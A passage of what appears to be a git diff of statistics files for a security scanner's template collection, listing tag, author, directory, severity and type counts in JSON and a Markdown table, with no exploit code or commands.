ame":"phpunit","count":1},{"name":"square","count":1},{"name":"mirai","count":1},{"name":"ilo4","count":1},{"name":"openx","count":1},{"name":"cerebro","count":1},{"name":"emby","count":1},{"name":"smi","count":1},{"name":"azkaban","count":1},{"name":"svn","count":1},{"name":"zookeeper","count":1},{"name":"zte","count":1},{"name":"proftpd","count":1},{"name":"spidercontrol","count":1},{"name":"etouch","count":1},{"name":"xampp","count":1},{"name":"mkdocs","count":1},{"name":"ricoh","count":1},{"name":"listserv","count":1},{"name":"finereport","count":1},{"name":"tensorboard","count":1},{"name":"vscode","count":1},{"name":"shiro","count":1},{"name":"email","count":1},{"name":"diris","count":1},{"name":"zeroshell","count":1},{"name":"zarafa","count":1},{"name":"package","count":1},{"name":"alerta","count":1},{"name":"aspnuke","count":1},{"name":"artica","count":1},{"name":"default","count":1},{"name":"tjws","count":1},{"name":"rockethchat","count":1},{"name":"cse","count":1},{"name":"labtech","count":1},{"name":"netgenie","count":1},{"name":"kafdrop","count":1},{"name":"totaljs","count":1},{"name":" default-login","count":1},{"name":"csrf","count":1},{"name":"codemeter","count":1},{"name":"glowroot","count":1},{"name":"wiki","count":1},{"name":"qdpm","count":1},{"name":"commscope","count":1},{"name":"jnoj","count":1},{"name":"scs","count":1},{"name":"auth","count":1},{"name":"szhe","count":1},{"name":"plugin","count":1},{"name":"maccmsv10","count":1},{"name":"luftguitar","count":1},{"name":"lg-nas","count":1},{"name":"codeigniter","count":1},{"name":"triconsole","count":1},{"name":"sophos","count":1},{"name":"dotnetnuke","count":1},{"name":"sql","count":1},{"name":"mrtg","count":1},{"name":"soar","count":1},{"name":"yachtcontrol","count":1},{"name":"wondercms","count":1},{"name":"cves2001","count":1},{"name":"geolocation","count":1},{"name":"emc","count":1},{"name":"dom","count":1},{"name":"erp-nc","count":1},{"name":"ambari","count":1},{"name":"krweb","count":1},{"name":"floc","count":1},{"name":"dvr","count":1},{"name":"directions","count":1},{"name":"dnssec","count":1},{"name":"keenetic","count":1},{"name":"plone","count":1},{"name":"ssltls","count":1},{"name":"weather","count":1},{"name":"hiboss","count":1},{"name":"jmx","count":1},{"name":"contentkeeper","count":1},{"name":"centreon","count":1},{"name":"ns","count":1},{"name":"panasonic","count":1},{"name":"calendarix","count":1},{"name":"crm","count":1},{"name":"optiLink","count":1},{"name":"esmtp","count":1},{"name":"zenario","count":1},{"name":"owasp","count":1},{"name":"geocode","count":1},{"name":"k8s","count":1},{"name":"moin","count":1},{"name":"graylog","count":1},{"name":"opm","count":1},{"name":"exponentcms","count":1},{"name":"domxss","count":1},{"name":"metinfo","count":1},{"name":"ulterius","count":1},{"name":"zcms","count":1},{"name":"pulsesecure","count":1},{"name":"panabit","count":1},{"name":"viewpoint","count":1},{"name":"cors","count":1},{"name":"rocketchat","count":1},{"name":"qvisdvr","count":1},{"name":"pagespeed","count":1},{"name":"visionhub","count":1},{"name":"timeclock","count":1},{"name":"grails","count":1},{"name":"lokalise","count":1},{"name":"roads","count":1},{"name":"timezone","count":1},{"name":"clusterengine","count":1},{"name":"phpwiki","count":1},{"name":"fortinet","count":1},{"name":"pivotaltracker","count":1},{"name":"metabase","count":1},{"name":"idemia","count":1},{"name":"place","count":1},{"name":"acontent","count":1},{"name":"twitter","count":1},{"name":"miscrsoft","count":1},{"name":"nuuo","count":1},{"name":"monitorr","count":1},{"name":"bingmaps","count":1},{"name":"smartblog","count":1},{"name":"javascript","count":1},{"name":"zm","count":1},{"name":"blind","count":1},{"name":"tcexam","count":1},{"name":"sureline","count":1},{"name":"gotmls","count":1},{"name":"buildkite","count":1},{"name":"limit","count":1},{"name":"distance","count":1},{"name":"doh","count":1},{"name":"netrc","count":1},{"name":"trilithic","count":1},{"name":"landray","count":1},{"name":"lotuscms","count":1},{"name":"hortonworks","count":1},{"name":"wooyun","count":1},{"name":"gateone","count":1},{"name":"shopxo","count":1},{"name":"seacms","count":1},{"name":"dbeaver","count":1},{"name":"pyramid","count":1},{"name":"sendgrid","count":1},{"name":"dvwa","count":1},{"name":"websvn","count":1},{"name":"iterable","count":1},{"name":"jaspersoft","count":1},{"name":"fortigate","count":1},{"name":"circontrol","count":1},{"name":"javamelody","count":1},{"name":"sourcebans","count":1},{"name":"arl","count":1},{"name":"beanstalk","count":1},{"name":"sage","count":1},{"name":"solman","count":1},{"name":"netdata","count":1},{"name":"shopware","count":1},{"name":"flexbe","count":1},{"name":"syslog","count":1},{"name":"cscart","count":1},{"name":"cofax","count":1},{"name":"bazarr","count":1},{"name":"redhat","count":1},{"name":"froxlor","count":1},{"name":"gurock","count":1},{"name":"apiman","count":1},{"name":"apos","count":1},{"name":"gridx","count":1},{"name":"thinkadmin","count":1},{"name":"okta","count":1},{"name":"moinmoin","count":1},{"name":"dotclear","count":1},{"name":"lighttpd","count":1},{"name":"elevation","count":1},{"name":"cloudinary","count":1},{"name":"yzmcms","count":1},{"name":"gitlist","count":1},{"name":"couchbase","count":1},{"name":"hadoop","count":1},{"name":"autocomplete","count":1},{"name":"ruckus","count":1},{"name":"jumpcloud","count":1},{"name":"tapestry","count":1},{"name":"rsyncd","count":1},{"name":"tinypng","count":1},{"name":"dropbox","count":1},{"name":"api-manager","count":1},{"name":"gitea","count":1},{"name":"terraform","count":1},{"name":"gstorage","count":1},{"name":"rabbitmq","count":1},{"name":"servicenow","count":1},{"name":"loganalyzer","count":1},{"name":"jquery","count":1},{"name":"influxdb","count":1},{"name":"swagger","count":1},{"name":"ssl","count":1},{"name":"webmin","count":1},{"name":"clockwatch","count":1},{"name":"drone","count":1},{"name":"clickhouse","count":1},{"name":"mautic","count":1},{"name":"memcached","count":1},{"name":"gunicorn","count":1},{"name":"sco","count":1},{"name":"beanshell","count":1},{"name":"fastapi","count":1},{"name":"phpshowtime","count":1},{"name":"alibaba","count":1},{"name":"bolt","count":1},{"name":"newrelic","count":1},{"name":"vsftpd","count":1},{"name":"asana","count":1},{"name":"instagram","count":1},{"name":"secmail","count":1},{"name":"lancom","count":1},{"name":"speed","count":1},{"name":"pacsone","count":1},{"name":"bigbluebutton","count":1},{"name":"raspap","count":1},{"name":"webftp","count":1},{"name":"myvuehelp","count":1},{"name":"svnserve","count":1},{"name":"sgp","count":1},{"name":"mysql","count":1},{"name":"magicflow","count":1},{"name":"rhymix","count":1},{"name":"csrfguard","count":1},{"name":"pihole","count":1},{"name":"embedthis","count":1},{"name":"springframework","count":1},{"name":"k8","count":1},{"name":"postmark","count":1},{"name":"glances","count":1},{"name":"announcekit","count":1},{"name":"anchorcms","count":1},{"name":"zmanda","count":1},{"name":"upnp","count":1},{"name":"csod","count":1},{"name":"mailgun","count":1},{"name":"myucms","count":1},{"name":"powercreator","count":1},{"name":"fortigates","count":1},{"name":"webui","count":1},{"name":"accela","count":1},{"name":"lutron","count":1},{"name":"appweb","count":1},{"name":"expn","count":1},{"name":"nuxeo","count":1},{"name":"oidc","count":1},{"name":"fedora","count":1},{"name":"cyberoam","count":1},{"name":"fortiweb","count":1},{"name":"nomad","count":1},{"name":"photo","count":1},{"name":"locations","count":1},{"name":"pmb","count":1},{"name":"smartsense","count":1},{"name":"empirecms","count":1},{"name":"opensns","count":1},{"name":"pcoip","count":1},{"name":"achecker","count":1},{"name":"tracer","count":1},{"name":"actuator","count":1},{"name":"phpinfo","count":1},{"name":"ipstack","count":1},{"name":"sarg","count":1},{"name":"okiko","count":1},{"name":"tileserver","count":1},{"name":"nerdgraph","count":1},{"name":"eyelock","count":1},{"name":"sprintful","count":1},{"name":"xunchi","count":1},{"name":"turbocrm","count":1},{"name":"lanproxy","count":1},{"name":"qsan","count":1},{"name":"etherpad","count":1},{"name":"openerp","count":1},{"name":"opencast","count":1},{"name":"ueditor","count":1},{"name":"basic-auth","count":1},{"name":"discourse","count":1},{"name":"cobub","count":1},{"name":"twitter-server","count":1},{"name":"bash","count":1},{"name":"wamp","count":1},{"name":"maxsite","count":1},{"name":"pendo","count":1},{"name":"xiuno","count":1},{"name":"xdcms","count":1},{"name":"mpsec","count":1},{"name":"chinaunicom","count":1},{"name":"shopizer","count":1},{"name":"ognl","count":1},{"name":"uwsgi","count":1},{"name":"pagerduty","count":1},{"name":"owa","count":1},{"name":"chevereto","count":1},{"name":"nc2","count":1},{"name":"clink-office","count":1},{"name":"tectuus","count":1},{"name":"database","count":1},{"name":"bookstack","count":1},{"name":"mantisbt","count":1},{"name":"mapbox","count":1},{"name":"webmodule-ee","count":1},{"name":"spring","count":1},{"name":"scimono","count":1},{"name":"viewlinc","count":1},{"name":"simplecrm","count":1},{"name":"imap","count":1},{"name":"sar2html","count":1},{"name":"cgi","count":1},{"name":"alertmanager","count":1},{"name":"ewebs","count":1},{"name":"daybyday","count":1},{"name":"cocoon","count":1},{"name":"nexusdb","count":1},{"name":"postgres","count":1},{"name":"ruby","count":1},{"name":"olivetti","count":1},{"name":"oneblog","count":1},{"name":"novnc","count":1},{"name":"werkzeug","count":1},{"name":"kerbynet","count":1},{"name":"rubedo","count":1},{"name":"spectracom","count":1},{"name":"axiom","count":1},{"name":"phpfusion","count":1},{"name":"calendly","count":1},{"name":"tor","count":1},{"name":"geutebruck","count":1},{"name":"tugboat","count":1},{"name":"wavlink","count":1},{"name":"realteo","count":1},{"name":"phalcon","count":1},{"name":"bullwark","count":1},{"name":"b2evolution","count":1},{"name":"remkon","count":1},{"name":"perl","count":1},{"name":"livezilla","count":1},{"name":"kindeditor","count":1},{"name":"faraday","count":1},{"name":"nweb2fax","count":1},{"name":"octoprint","count":1},{"name":"avtech","count":1},{"name":"robomongo","count":1},{"name":"redcap","count":1},{"name":"craftcms","count":1},{"name":"74cms","count":1},{"name":"checkpoint","count":1},{"name":"wing-ftp","count":1},{"name":"zzzcms","count":1},{"name":"jsp","count":1},{"name":"cloudron","count":1},{"name":"tpshop","count":1},{"name":"xmlchart","count":1},{"name":"st","count":1},{"name":"htmli","count":1},{"name":"salesforce","count":1},{"name":"ghost","count":1},{"name":"placeos","count":1},{"name":"gloo","count":1},{"name":"visualtools","count":1},{"name":"ioncube","count":1},{"name":"setup","count":1},{"name":"saltapi","count":1},{"name":"webadmin","count":1},{"name":"synnefo","count":1},{"name":"vnc","count":1},{"name":"sentry","count":1},{"name":"gespage","count":1},{"name":"omi","count":1},{"name":"argussurveillance","count":1},{"name":"skywalking","count":1},{"name":"mobileiron","count":1},{"name":"shoppable","count":1},{"name":"clave","count":1},{"name":"wildfly","count":1},{"name":"zms","count":1},{"name":"woocomernce","count":1},{"name":"logontracer","count":1},{"name":"ntopng","count":1},{"name":"elasticsearch","count":1},{"name":"parentlink","count":1},{"name":"kyan","count":1},{"name":"mantis","count":1},{"name":"mongoshake","count":1},{"name":"ganglia","count":1},{"name":"buttercms","count":1},{"name":"sceditor","count":1},{"name":"rmi","count":1},{"name":"zyxel","count":1},{"name":"nette","count":1},{"name":"fortilogger","count":1},{"name":"eg","count":1},{"name":"matrix","count":1},{"name":"jeewms","count":1},{"name":"plastic","count":1},{"name":"cherokee","count":1},{"name":"motorola","count":1},{"name":"javafaces","count":1},{"name":"nimble","count":1},{"name":"nps","count":1},{"name":"processmaker","count":1},{"name":"gogs","count":1},{"name":"sqlite","count":1},{"name":"jenkin","count":1},{"name":"wakatime","count":1},{"name":"key","count":1},{"name":"redwood","count":1},{"name":"kubeflow","count":1},{"name":"duomicms","count":1},{"name":"majordomo2","count":1},{"name":"geddy","count":1},{"name":"spip","count":1},{"name":"socomec","count":1},{"name":"varnish","count":1},{"name":"nordex","count":1},{"name":"zend","count":1},{"name":"weiphp","count":1},{"name":"asus","count":1},{"name":"camunda","count":1},{"name":"pippoint","count":1},{"name":"frontpage","count":1},{"name":"loqate","count":1},{"name":"nifi","count":1},{"name":"pgadmin","count":1},{"name":"nearby","count":1},{"name":"biometrics","count":1},{"name":"openweather","count":1},{"name":"fastcgi","count":1},{"name":"phpfastcache","count":1},{"name":"subrion","count":1},{"name":"haproxy","count":1},{"name":"graph","count":1},{"name":"octobercms","count":1},{"name":"tenda","count":1},{"name":"whm","count":1},{"name":"sonarcloud","count":1},{"name":"tensorflow","count":1},{"name":"timesheet","count":1},{"name":"burp","count":1},{"name":"openstack","count":1},{"name":"portainer","count":1},{"name":"vidyo","count":1},{"name":"mod-proxy","count":1},{"name":"xvr","count":1},{"name":"acexy","count":1},{"name":"youtube","count":1},{"name":"expressjs","count":1},{"name":"goahead","count":1},{"name":"primetek","count":1},{"name":"vsphere","count":1},{"name":"servicedesk","count":1},{"name":"digitalocean","count":1},{"name":"eprints","count":1},{"name":"mediumish","count":1},{"name":"natemail","count":1},{"name":"rujjie","count":1},{"name":"addpac","count":1},{"name":"websphere","count":1},{"name":"linksys","count":1},{"name":"monitorix","count":1},{"name":"wavemaker","count":1},{"name":"h3c-imc","count":1},{"name":"eyou","count":1},{"name":"cloudflare","count":1},{"name":"opensmtpd","count":1},{"name":"postmessage","count":1},{"name":"circle","count":1},{"name":"clockwork","count":1},{"name":"elfinder","count":1},{"name":"xml","count":1},{"name":"rmc","count":1}],"authors":[{"name":"daffainfo","count":288},{"name":"pikpikcu","count":280},{"name":"dhiyaneshdk","count":273},{"name":"pdteam","count":201},{"name":"geeknik","count":162},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":72},{"name":"princechaddha","count":66},{"name":"madrobot","count":63},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":50},{"name":"gaurang","count":42},{"name":"philippedelteil","count":29},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"melbadry9","count":10},{"name":"righettod","count":10},{"name":"nadino","count":10},{"name":"wdahlenb","count":10},{"name":"hackergautam","count":9},{"name":"that_juan_","count":8},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"oppsec","count":7},{"name":"emadshanab","count":7},{"name":"techryptic (@tech)","count":7},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"kophjager007","count":7},{"name":"meme-lord","count":7},{"name":"dogasantos","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"pentest_swissky","count":6},{"name":"caspergn","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"divya_mudgal","count":6},{"name":"logicalhunter","count":6},{"name":"rootxharsh","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"lu4nx","count":5},{"name":"xelkomy","count":5},{"name":"ganofins","count":5},{"name":"iamnoooob","count":5},{"name":"johnk3r","count":5},{"name":"elsfa7110","count":5},{"name":"joanbono","count":5},{"name":"github.com/its0x08","count":4},{"name":"nodauf","count":4},{"name":"incogbyte","count":4},{"name":"e_schultze_","count":4},{"name":"f1tz","count":3},{"name":"vsh00t","count":3},{"name":"z3bd","count":3},{"name":"_generic_human_","count":3},{"name":"0w4ys","count":3},{"name":"skeltavik","count":3},{"name":"shine","count":3},{"name":"fyoorer","count":3},{"name":"sullo","count":3},{"name":"shifacyclewala","count":3},{"name":"thomas_from_offensity","count":3},{"name":"impramodsargar","count":3},{"name":"dudez","count":3},{"name":"emenalf","count":3},{"name":"binaryfigments","count":3},{"name":"jarijaas","count":3},{"name":"tess","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"unstabl3","count":3},{"name":"me9187","count":3},{"name":"johnjhacking","count":3},{"name":"sushantkamble","count":3},{"name":"mavericknerd","count":3},{"name":"idealphase","count":3},{"name":"0xrudra","count":2},{"name":"dheerajmadhukar","count":2},{"name":"vavkamil","count":2},{"name":"bp0lr","count":2},{"name":"bsysop","count":2},{"name":"0xelkomy","count":2},{"name":"moritz nentwig","count":2},{"name":"g4l1t0","count":2},{"name":"convisoappsec","count":2},{"name":"nkxxkn","count":2},{"name":"parth","count":2},{"name":"huowuzhao","count":2},{"name":"whoever","count":2},{"name":"w4cky_","count":2},{"name":"davidmckennirey","count":2},{"name":"kiblyn11","count":2},{"name":"socketz","count":2},{"name":"swissky","count":2},{"name":"0xsmiley","count":2},{"name":"cocxanh","count":2},{"name":"joeldeleep","count":2},{"name":"sy3omda","count":2},{"name":"0xcrypto","count":2},{"name":"mohammedsaneem","count":2},{"name":"manas_harsh","count":2},{"name":"afaq","count":2},{"name":"amsda","count":2},{"name":"koti2","count":2},{"name":"bernardofsr","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"r3naissance","count":2},{"name":"zomsop82","count":2},{"name":"hetroublemakr","count":2},{"name":"gevakun","count":2},{"name":"foulenzer","count":2},{"name":"random-robbie","count":2},{"name":"ree4pwn","count":2},{"name":"0xsapra","count":2},{"name":"gal nagli","count":2},{"name":"hahwul","count":2},{"name":"alifathi-h1","count":2},{"name":"ehsahil","count":2},{"name":"lotusdll","count":2},{"name":"fabaff","count":2},{"name":"r12w4n","count":2},{"name":"arcc","count":2},{"name":"udit_thakkur","count":2},{"name":"bing0o","count":2},{"name":"x1m_martijn","count":2},{"name":"0xprial","count":2},{"name":"pxmme1337","count":2},{"name":"randomrobbie","count":2},{"name":"deena","count":1},{"name":"qlkwej","count":1},{"name":"_harleo","count":1},{"name":"rotemreiss","count":1},{"name":"jteles","count":1},{"name":"x6263","count":1},{"name":"thebinitghimire","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"makyotox","count":1},{"name":"b4uh0lz","count":1},{"name":"schniggie","count":1},{"name":"andysvints","count":1},{"name":"@ofjaaah","count":1},{"name":"b0rn2r00t","count":1},{"name":"daviey","count":1},{"name":"kurohost","count":1},{"name":"intx0x80","count":1},{"name":"sec_hawk","count":1},{"name":"forgedhallpass","count":1},{"name":"shreyapohekar","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"berkdusunur","count":1},{"name":"affix","count":1},{"name":"ilovebinbash","count":1},{"name":"fopina","count":1},{"name":"notsoevilweasel","count":1},{"name":"elmahdi","count":1},{"name":"rodnt","count":1},{"name":"oscarintherocks","count":1},{"name":"push4d","count":1},{"name":"thezakman","count":1},{"name":"droberson","count":1},{"name":"s1r1u5_","count":1},{"name":"kareemse1im","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"juicypotato1","count":1},{"name":"hanlaomo","count":1},{"name":"mhdsamx","count":1},{"name":"akash.c","count":1},{"name":"d0rkerdevil","count":1},{"name":"apt-mirror","count":1},{"name":"revblock","count":1},{"name":"0xrod","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"ipanda","count":1},{"name":"ooooooo_q","count":1},{"name":"omarkurt","count":1},{"name":"wabafet","count":1},{"name":"alperenkesk","count":1},{"name":"adrianmf","count":1},{"name":"naglinagli","count":1},{"name":"chron0x","count":1},{"name":"jeya seelan","count":1},{"name":"ringo","count":1},{"name":"undefl0w","count":1},{"name":"yavolo","count":1},{"name":"pudsec","count":1},{"name":"pratik khalane","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"elder tao","count":1},{"name":"elouhi","count":1},{"name":"kabirsuda","count":1},{"name":"furkansenan","count":1},{"name":"ldionmarcil","count":1},{"name":"mubassirpatel","count":1},{"name":"ahmetpergamum","count":1},{"name":"ohlinge","count":1},{"name":"andirrahmani1","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"lark lab","count":1},{"name":"noamrathaus","count":1},{"name":"akshansh","count":1},{"name":"alph4byt3","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"absshax","count":1},{"name":"dawid-czarnecki","count":1},{"name":"its0x08","count":1},{"name":"jrolf","count":1},{"name":"smaranchand","count":1},{"name":"_darrenmartyn","count":1},{"name":"th3.d1p4k","count":1},{"name":"sicksec","count":1},{"name":"0xd0ff9","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"kre80r","count":1},{"name":"nytr0gen","count":1},{"name":"yashgoti","count":1},{"name":"alex","count":1},{"name":"taielab","count":1},{"name":"patralos","count":1},{"name":"ahmed sherif","count":1},{"name":"mass0ma","count":1},{"name":"0xteles","count":1},{"name":"0ut0fb4nd","count":1},{"name":"philippdelteil","count":1},{"name":"hakluke","count":1},{"name":"borna nematzadeh","count":1},{"name":"xstp","count":1},{"name":"thevillagehacker","count":1},{"name":"orpheus","count":1},{"name":"bad5ect0r","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"pdp","count":1},{"name":"aresx","count":1},{"name":"exploitation","count":1},{"name":"@dwisiswant0","count":1},{"name":"infosecsanyam","count":1},{"name":"defr0ggy","count":1},{"name":"sickwell","count":1},{"name":"zandros0","count":1},{"name":"remonsec","count":1},{"name":"0xtavian","count":1},{"name":"nerrorsec","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"iampritam","count":1},{"name":"tirtha_mandal","count":1},{"name":"co0nan","count":1},{"name":"willd96","count":1},{"name":"gboddin","count":1},{"name":"izn0u","count":1},{"name":"52971","count":1},{"name":"luskabol","count":1},{"name":"retr0","count":1},{"name":"blckraven","count":1},{"name":"bolli95","count":1},{"name":"evolutionsec","count":1},{"name":"clarkvoss","count":1},{"name":"soyelmago","count":1},{"name":"j33n1k4","count":1},{"name":"streetofhackerr007","count":1},{"name":"shelld3v","count":1},{"name":"0h1in9e","count":1},{"name":"rojanrijal","count":1},{"name":"geraldino2","count":1},{"name":"cookiehanhoan","count":1},{"name":"un-fmunozs","count":1},{"name":"petruknisme","count":1},{"name":"udyz","count":1},{"name":"zhenwarx","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"toufik airane","count":1},{"name":"yashanand155","count":1},{"name":"becivells","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"bjhulst","count":1},{"name":"vzamanillo","count":1},{"name":"luci","count":1},{"name":"whynotke","count":1},{"name":"knassar702","count":1},{"name":"manuelbua","count":1},{"name":"mesaglio","count":1},{"name":"c3l3si4n","count":1},{"name":"raesene","count":1},{"name":"regala_","count":1},{"name":"flag007","count":1},{"name":"b0yd","count":1},{"name":"mah3sec_","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"sshell","count":1},{"name":"brabbit10","count":1},{"name":"tim_koopmans","count":1},{"name":"micha3lb3n","count":1},{"name":"shifacyclewla","count":1},{"name":"_c0wb0y_","count":1},{"name":"fmunozs","count":1},{"name":"nvn1729","count":1},{"name":"ajaysenr","count":1}],"directory":[{"name":"cves","count":831},{"name":"vulnerabilities","count":324},{"name":"exposed-panels","count":264},{"name":"technologies","count":201},{"name":"exposures","count":191},{"name":"misconfiguration","count":139},{"name":"takeovers","count":65},{"name":"token-spray","count":63},{"name":"default-logins","count":60},{"name":"file","count":50},{"name":"workflows","count":38},{"name":"network","count":32},{"name":"iot","count":27},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":743},{"name":"high","count":641},{"name":"medium","count":474},{"name":"critical","count":294},{"name":"low","count":155}],"types":[{"name":"http","count":2195},{"name":"file","count":50},{"name":"network","count":45},{"name":"dns","count":12}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index a401b344fc..7e62861261 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,925 +1,925 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 828 | daffainfo | 288 | cves | 832 | info | 749 | http | 2205 | -| lfi | 340 | pikpikcu | 280 | vulnerabilities | 327 | high | 645 | file | 50 | -| panel | 272 | dhiyaneshdk | 278 | exposed-panels | 269 | medium | 474 | network | 45 | +| cve | 827 | daffainfo | 288 | cves | 831 | info | 743 | http | 2195 | +| lfi | 337 | pikpikcu | 280 | vulnerabilities | 324 | high | 641 | file | 50 | +| panel | 267 | dhiyaneshdk | 273 | exposed-panels | 264 | medium | 474 | network | 45 | | xss | 258 | pdteam | 201 | technologies | 201 | critical | 294 | dns | 12 | -| wordpress | 252 | geeknik | 162 | exposures | 191 | low | 155 | | | -| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 140 | | | | | +| wordpress | 249 | geeknik | 162 | exposures | 191 | low | 155 | | | +| exposure | 239 | dwisiswant0 | 131 | misconfiguration | 139 | | | | | | rce | 212 | gy741 | 81 | takeovers | 65 | | | | | | tech | 195 | pussycat0x | 72 | token-spray | 63 | | | | | -| wp-plugin | 175 | princechaddha | 66 | default-logins | 60 | | | | | -| cve2020 | 164 | zzeitlin | 63 | file | 50 | | | | | -| cve2021 | 155 | madrobot | 63 | workflows | 38 | | | | | -| joomla | 128 | 0x_akoko | 53 | network | 32 | | | | | +| wp-plugin | 172 | princechaddha | 66 | default-logins | 60 | | | | | +| cve2020 | 164 | madrobot | 63 | file | 50 | | | | | +| cve2021 | 155 | zzeitlin | 63 | workflows | 38 | | | | | +| joomla | 128 | 0x_akoko | 50 | network | 32 | | | | | | cve2010 | 109 | gaurang | 42 | iot | 27 | | | | | | cve2019 | 97 | philippedelteil | 29 | miscellaneous | 24 | | | | | | config | 95 | ice3man | 26 | dns | 12 | | | | | | cve2018 | 88 | organiccrap | 24 | fuzzing | 10 | | | | | | apache | 73 | sheikhrishad | 15 | cnvd | 9 | | | | | | takeover | 69 | pr3r00t | 15 | headless | 5 | | | | | -| iot | 68 | milo2012 | 14 | | | | | | | -| default-login | 68 | techbrunchfr | 13 | | | | | | | -| oob | 68 | suman_kar | 12 | | | | | | | -| token | 67 | r3dg33k | 11 | | | | | | | -| token-spray | 63 | cyllective | 11 | | | | | | | -| cve2017 | 51 | righettod | 10 | | | | | | | -| file | 50 | melbadry9 | 10 | | | | | | | -| unauth | 49 | nadino | 10 | | | | | | | +| default-login | 68 | milo2012 | 14 | | | | | | | +| oob | 68 | techbrunchfr | 13 | | | | | | | +| iot | 68 | suman_kar | 12 | | | | | | | +| token | 67 | cyllective | 11 | | | | | | | +| token-spray | 63 | r3dg33k | 11 | | | | | | | +| cve2017 | 51 | wdahlenb | 10 | | | | | | | +| file | 50 | nadino | 10 | | | | | | | +| unauth | 49 | melbadry9 | 10 | | | | | | | | network | 43 | random_robbie | 10 | | | | | | | -| ssrf | 41 | wdahlenb | 10 | | | | | | | +| ssrf | 41 | righettod | 10 | | | | | | | | sqli | 40 | hackergautam | 9 | | | | | | | -| | 38 | zh | 8 | | | | | | | -| redirect | 37 | iamthefrogy | 8 | | | | | | | +| | 38 | aashiq | 8 | | | | | | | | cve2016 | 37 | that_juan_ | 8 | | | | | | | -| oracle | 36 | aashiq | 8 | | | | | | | -| google | 30 | harshbothra_ | 7 | | | | | | | -| logs | 30 | techryptic (@tech) | 7 | | | | | | | -| jira | 29 | oppsec | 7 | | | | | | | -| atlassian | 29 | 0x240x23elu | 7 | | | | | | | -| cve2015 | 29 | dr_set | 7 | | | | | | | -| listing | 27 | emadshanab | 7 | | | | | | | -| cve2014 | 27 | meme-lord | 7 | | | | | | | +| redirect | 37 | zh | 8 | | | | | | | +| oracle | 36 | iamthefrogy | 8 | | | | | | | +| logs | 30 | dr_set | 7 | | | | | | | +| google | 30 | emadshanab | 7 | | | | | | | +| jira | 28 | 0x240x23elu | 7 | | | | | | | +| atlassian | 28 | dogasantos | 7 | | | | | | | +| cve2015 | 28 | techryptic (@tech) | 7 | | | | | | | | cisco | 27 | randomstr1ng | 7 | | | | | | | -| generic | 24 | dogasantos | 7 | | | | | | | -| auth-bypass | 23 | kophjager007 | 7 | | | | | | | -| misc | 23 | __fazal | 6 | | | | | | | -| disclosure | 23 | caspergn | 6 | | | | | | | -| misconfig | 21 | puzzlepeaches | 6 | | | | | | | -| router | 21 | pentest_swissky | 6 | | | | | | | -| aem | 19 | logicalhunter | 6 | | | | | | | -| springboot | 18 | divya_mudgal | 6 | | | | | | | -| sap | 18 | yanyun | 5 | | | | | | | -| debug | 18 | iamnoooob | 5 | | | | | | | -| cve2012 | 18 | xelkomy | 5 | | | | | | | -| php | 16 | rootxharsh | 5 | | | | | | | +| listing | 27 | kophjager007 | 7 | | | | | | | +| cve2014 | 27 | harshbothra_ | 7 | | | | | | | +| generic | 24 | oppsec | 7 | | | | | | | +| misc | 23 | meme-lord | 7 | | | | | | | +| disclosure | 23 | puzzlepeaches | 6 | | | | | | | +| auth-bypass | 23 | logicalhunter | 6 | | | | | | | +| router | 21 | divya_mudgal | 6 | | | | | | | +| misconfig | 20 | pentest_swissky | 6 | | | | | | | +| aem | 19 | caspergn | 6 | | | | | | | +| sap | 18 | __fazal | 6 | | | | | | | +| cve2012 | 18 | ganofins | 5 | | | | | | | +| debug | 18 | rootxharsh | 5 | | | | | | | +| springboot | 18 | lu4nx | 5 | | | | | | | +| php | 16 | xelkomy | 5 | | | | | | | +| cve2011 | 15 | yanyun | 5 | | | | | | | | devops | 15 | johnk3r | 5 | | | | | | | -| cve2011 | 15 | panch0r3d | 5 | | | | | | | -| login | 14 | ganofins | 5 | | | | | | | -| fuzz | 14 | elsfa7110 | 5 | | | | | | | -| weblogic | 14 | joanbono | 5 | | | | | | | -| cve2009 | 14 | lu4nx | 5 | | | | | | | -| struts | 14 | e_schultze_ | 4 | | | | | | | -| aws | 14 | tess | 4 | | | | | | | +| weblogic | 14 | iamnoooob | 5 | | | | | | | +| login | 14 | elsfa7110 | 5 | | | | | | | +| struts | 14 | joanbono | 5 | | | | | | | +| cve2009 | 14 | panch0r3d | 5 | | | | | | | +| fuzz | 14 | e_schultze_ | 4 | | | | | | | +| aws | 14 | github.com/its0x08 | 4 | | | | | 